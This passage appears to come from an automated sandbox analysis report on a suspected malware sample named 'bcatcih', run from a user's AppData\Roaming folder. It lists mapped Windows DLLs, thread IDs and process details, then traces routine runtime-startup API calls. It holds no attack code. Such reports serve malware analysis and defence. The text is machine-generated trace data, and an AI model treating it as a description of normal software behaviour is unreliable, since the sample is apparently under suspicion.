"c:\\windows\\system32\\authz.dll") Region: id = 2510 start_va = 0x7ffc5b240000 end_va = 0x7ffc5b24bfff monitored = 0 entry_point = 0x7ffc5b2427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2511 start_va = 0x7ffc5b280000 end_va = 0x7ffc5b28cfff monitored = 0 entry_point = 0x7ffc5b281fe0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2512 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2513 start_va = 0x7ffc5b380000 end_va = 0x7ffc5b3f9fff monitored = 0 entry_point = 0x7ffc5b3a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2514 start_va = 0x7ffc5b440000 end_va = 0x7ffc5b473fff monitored = 0 entry_point = 0x7ffc5b45ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2515 start_va = 0x7ffc5b480000 end_va = 0x7ffc5b489fff monitored = 0 entry_point = 0x7ffc5b481830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2516 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2517 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2518 start_va = 0x7ffc5b7b0000 end_va = 0x7ffc5b7c6fff monitored = 0 entry_point = 0x7ffc5b7b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2519 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2520 start_va = 0x7ffc5b910000 end_va = 0x7ffc5b930fff monitored = 0 entry_point = 0x7ffc5b920250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2521 start_va = 0x7ffc5b960000 end_va = 0x7ffc5b999fff monitored = 0 entry_point = 0x7ffc5b968d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2522 start_va = 0x7ffc5b9a0000 end_va = 0x7ffc5b9c6fff monitored = 0 entry_point = 0x7ffc5b9b0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2523 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2524 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2525 start_va = 0x7ffc5bca0000 end_va = 0x7ffc5bcb8fff monitored = 0 entry_point = 0x7ffc5bca5e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2526 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2527 start_va = 0x7ffc5bcf0000 end_va = 0x7ffc5bd88fff monitored = 0 entry_point = 0x7ffc5bd1f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2528 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2529 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2530 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2531 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2532 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2533 start_va = 0x7ffc5bf10000 end_va = 0x7ffc5bf95fff monitored = 0 entry_point = 0x7ffc5bf1d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2534 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2535 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2536 start_va = 0x7ffc5c360000 end_va = 0x7ffc5c3b4fff monitored = 0 entry_point = 0x7ffc5c377970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2537 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2538 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2539 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2540 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2541 start_va = 0x7ffc5cc10000 end_va = 0x7ffc5cc6bfff monitored = 0 entry_point = 0x7ffc5cc2b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2542 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2543 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2544 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2545 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2546 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2547 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2548 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2549 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2550 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2551 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2552 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2553 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2554 start_va = 0x7ffc5ee90000 end_va = 0x7ffc5f2b8fff monitored = 0 entry_point = 0x7ffc5eeb8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2555 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2556 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2557 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2558 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2573 start_va = 0x7e30000 end_va = 0x7f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e30000" filename = "" Region: id = 2574 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 2575 start_va = 0x8200000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 2576 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 5337 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5907 start_va = 0x8530000 end_va = 0x862ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008530000" filename = "" Thread: id = 52 os_tid = 0x680 Thread: id = 53 os_tid = 0x12e4 Thread: id = 54 os_tid = 0x13dc Thread: id = 55 os_tid = 0x13c4 Thread: id = 56 os_tid = 0x1270 Thread: id = 57 os_tid = 0x126c Thread: id = 58 os_tid = 0x82c Thread: id = 59 os_tid = 0x4e0 Thread: id = 60 os_tid = 0x2a4 Thread: id = 61 os_tid = 0xe90 Thread: id = 62 os_tid = 0x3c0 Thread: id = 63 os_tid = 0xe80 Thread: id = 64 os_tid = 0xe94 Thread: id = 65 os_tid = 0x424 Thread: id = 66 os_tid = 0xe8c Thread: id = 67 os_tid = 0xdb4 Thread: id = 68 os_tid = 0xdd4 Thread: id = 69 os_tid = 0x514 Thread: id = 70 os_tid = 0xf2c Thread: id = 71 os_tid = 0xcb4 Thread: id = 72 os_tid = 0x474 Thread: id = 73 os_tid = 0xc9c Thread: id = 74 os_tid = 0xc90 Thread: id = 75 os_tid = 0xc70 Thread: id = 76 os_tid = 0xc94 Thread: id = 77 os_tid = 0xc74 Thread: id = 78 os_tid = 0x900 Thread: id = 79 os_tid = 0xc20 Thread: id = 80 os_tid = 0xc28 Thread: id = 81 os_tid = 0xc18 Thread: id = 82 os_tid = 0xc0c Thread: id = 83 os_tid = 0xa0c Thread: id = 84 os_tid = 0x9ec Thread: id = 85 os_tid = 0xa2c Thread: id = 86 os_tid = 0xabc Thread: id = 87 os_tid = 0xb9c Thread: id = 88 os_tid = 0xfe8 Thread: id = 89 os_tid = 0xfc0 Thread: id = 90 os_tid = 0xfb8 Thread: id = 91 os_tid = 0xfa0 Thread: id = 92 os_tid = 0xf4c Thread: id = 93 os_tid = 0xc64 Thread: id = 94 os_tid = 0xb4c Thread: id = 95 os_tid = 0x9fc Thread: id = 96 os_tid = 0x9d8 Thread: id = 97 os_tid = 0x9b4 Thread: id = 98 os_tid = 0x9ac Thread: id = 99 os_tid = 0x9a4 Thread: id = 100 os_tid = 0x950 Thread: id = 101 os_tid = 0x94c Thread: id = 102 os_tid = 0x948 Thread: id = 103 os_tid = 0x928 Thread: id = 104 os_tid = 0x8f8 Thread: id = 105 os_tid = 0x8c4 Thread: id = 106 os_tid = 0x8b0 Thread: id = 107 os_tid = 0x894 Thread: id = 108 os_tid = 0x888 Thread: id = 109 os_tid = 0x86c Thread: id = 110 os_tid = 0x840 Thread: id = 111 os_tid = 0x4f4 Thread: id = 112 os_tid = 0x464 Thread: id = 113 os_tid = 0x4d0 Thread: id = 114 os_tid = 0x420 Thread: id = 115 os_tid = 0x7c0 Thread: id = 116 os_tid = 0x608 Thread: id = 117 os_tid = 0x4f8 Thread: id = 118 os_tid = 0x49c Thread: id = 119 os_tid = 0x2ac Thread: id = 120 os_tid = 0x1b4 Thread: id = 121 os_tid = 0x1b8 Thread: id = 122 os_tid = 0x1cc Thread: id = 123 os_tid = 0x16c Thread: id = 124 os_tid = 0x190 Thread: id = 125 os_tid = 0x3fc Thread: id = 126 os_tid = 0x3f4 Thread: id = 127 os_tid = 0x3e8 Thread: id = 128 os_tid = 0x3e4 Thread: id = 129 os_tid = 0x3d0 Thread: id = 130 os_tid = 0x3cc Thread: id = 131 os_tid = 0x348 Thread: id = 132 os_tid = 0x938 Thread: id = 133 os_tid = 0x9a8 Thread: id = 134 os_tid = 0xf28 Thread: id = 135 os_tid = 0xedc Thread: id = 143 os_tid = 0xb64 Process: id = "5" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x24213000" os_pid = "0x8b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x344" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2841 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2842 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2843 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2844 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2845 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2846 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2847 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x4194d0 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2848 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2849 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2850 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2851 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2852 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2853 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3120 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3121 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3122 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3123 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3124 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3125 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3126 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3127 start_va = 0x530000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3128 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3129 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3298 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3299 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3300 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3301 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3302 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3311 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 3366 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3527 start_va = 0x6f0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Thread: id = 136 os_tid = 0x5e8 [0173.422] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0173.422] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.423] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x830000 [0176.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0176.831] GetProcAddress (hModule=0x74530000, lpProcName="FlsAlloc") returned 0x7454a980 [0176.831] GetProcAddress (hModule=0x74530000, lpProcName="FlsGetValue") returned 0x74547570 [0176.831] GetProcAddress (hModule=0x74530000, lpProcName="FlsSetValue") returned 0x74549e30 [0176.831] GetProcAddress (hModule=0x74530000, lpProcName="FlsFree") returned 0x74554ff0 [0176.917] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x238) returned 0x8305a8 [0176.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0176.918] GetCurrentThreadId () returned 0x5e8 [0176.918] GetStartupInfoW (in: lpStartupInfo=0x19fea0 | out: lpStartupInfo=0x19fea0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8305c8, hStdOutput=0x41f514, hStdError=0x0)) [0176.918] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x824) returned 0x8307e8 [0176.918] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0176.918] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0176.918] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0176.918] SetHandleCount (uNumber=0x20) returned 0x20 [0176.918] GetCommandLineW () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0176.919] GetEnvironmentStringsW () returned 0x5ffee8* [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xa3a) returned 0x831018 [0176.919] FreeEnvironmentStringsW (penv=0x5ffee8) returned 1 [0176.919] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44bf28, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x88) returned 0x831a60 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xb4) returned 0x831af0 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x62) returned 0x831bb0 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x80) returned 0x831c20 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x92) returned 0x831ca8 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x9c) returned 0x831d48 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x86) returned 0x831df0 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x4c) returned 0x831e80 [0176.919] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x6c) returned 0x831ed8 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x3e) returned 0x831f50 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x5e) returned 0x831f98 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x86) returned 0x832000 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x4e) returned 0x832090 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x52) returned 0x8320e8 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x40) returned 0x832148 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xf6) returned 0x832190 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xa0) returned 0x832290 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x5a) returned 0x832338 [0176.920] 